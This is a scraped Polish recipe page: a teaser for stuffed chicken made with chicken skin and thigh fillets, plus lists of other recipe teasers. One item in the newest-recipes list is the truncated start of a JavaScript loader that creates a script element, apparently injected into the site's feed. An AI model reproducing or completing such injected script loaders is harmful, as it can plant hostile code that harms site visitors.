Kurczak faszerowany
Źródło: https://maminek61.blogspot.com/2014/12/kurczak-faszerowany.html
Kurczak faszerowany w zupełnie nowym wydaniu.Oczywiście można użyć kurczaka w całości i bawić się w oddzielanie kościod mięsa, ale znacznie prościej jest wykorzystać skórkę z kurczaka i gotowe części,takie, jak filety z udek. Składniki:-skórka z kurczaka-10 filetów z udek-podwójna pierś z kurczaka-20 dkg wątróbki drobiowej-1 duża czerstwa...
Najnowsze przepisy
Składniki:recipe: 1 rolkę ciasta francuskiego rozwinąć... ⇖ 9
Domowe sosy to często niedoceniane skarby domowej kuchni.... ⇖ 9
Jeden zapach, jeden kęs - i nagle wracają wspomnienia.... ⇖ 10
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 18
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 42
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 32
Przepisy z bloga
Proponujemy roladki uniwersalne:na ciepło do obiadulubna... ⇖ 148
To jest nasze ulubione ciasto na lato i nie tylko.Można... ⇖ 307
Nasza propozycja na soczysty filet z piersi kurczaka. ... ⇖ 433
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 363
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 272
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 215
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 210
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 176
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 156
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 74
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 71









































